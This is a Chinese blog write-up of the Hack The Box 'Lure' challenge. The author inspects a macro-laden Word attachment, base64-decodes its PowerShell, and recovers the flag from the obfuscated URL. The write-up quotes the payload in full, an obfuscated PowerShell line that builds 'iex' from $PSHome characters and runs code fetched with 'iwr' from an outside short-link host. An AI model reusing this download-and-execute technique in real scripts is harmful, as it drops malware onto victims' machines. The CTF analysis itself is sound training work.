hack the box-challenges:Lure题解

打开题目,看下题目的要求说了啥,翻译一下就是:财务团队收到了一封看起来很重要的电子邮件,其中包含附加的 Word 文档。你能看一下并确认它是否是恶意的吗?
下载下来文件,一打开,确实是word文档。
在这里插入图片描述
木马,不存在的,我tm直接打开,我就不信了。
在这里插入图片描述
好吧,打开确实是word,但是看不到其他内容了。
此时我想到,要不用binwalk看下?

binwalk UegentPayment.doc

在这里插入图片描述
也看不出什么东西,那么咱们直接找别人的教程吧(逃……)
在kali中用libreoffice打开,提示包含macro什么什么的,就是宏,不管,先打开。
在这里插入图片描述
接着我们选择tools,macros,edit Macros。
在这里插入图片描述
在里面搜啊搜,找啊找,发现了一段似乎是powershell的东西
在这里插入图片描述
捞出来
在这里插入图片描述
应该是加密了之类的,我们尝试用base64解密下看看
在这里插入图片描述
确实是powershell,放进powershell执行一下
在这里插入图片描述
“该脚本尝试向该站点调用 GET 请求,但似乎它不存在……”
所以现在要做的是创建一个名为 test 的变量,并将其分配为 PowerShell 脚本的加密部分,以便以可读的格式查看它。
在这里插入图片描述

pOwErshElL $(-jOiN(($PshOMe[4]),("$PsHoME")[+15],"x");)(iwr $($test=("{5}{25}{8}{7}{0}{14}{3}{21}{2}{22}{15}{16}{31}{28}{11}{26}{17}{23}{27}{29}{10}{1}{6}{24}{30}{18}{13}{19}{12}{9}{20}{4}"-f "B","U","4","B","%7D","ht","R_d","//ow.ly/HT","p:","T","0","_","N","M","%7","E","f","1T","u","e","5","k","R","h","0","t","w","_","l","Y","C","U")))

然后输出一下$test,发现了flag

write-output $test

在这里插入图片描述
解密一下
在这里插入图片描述

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值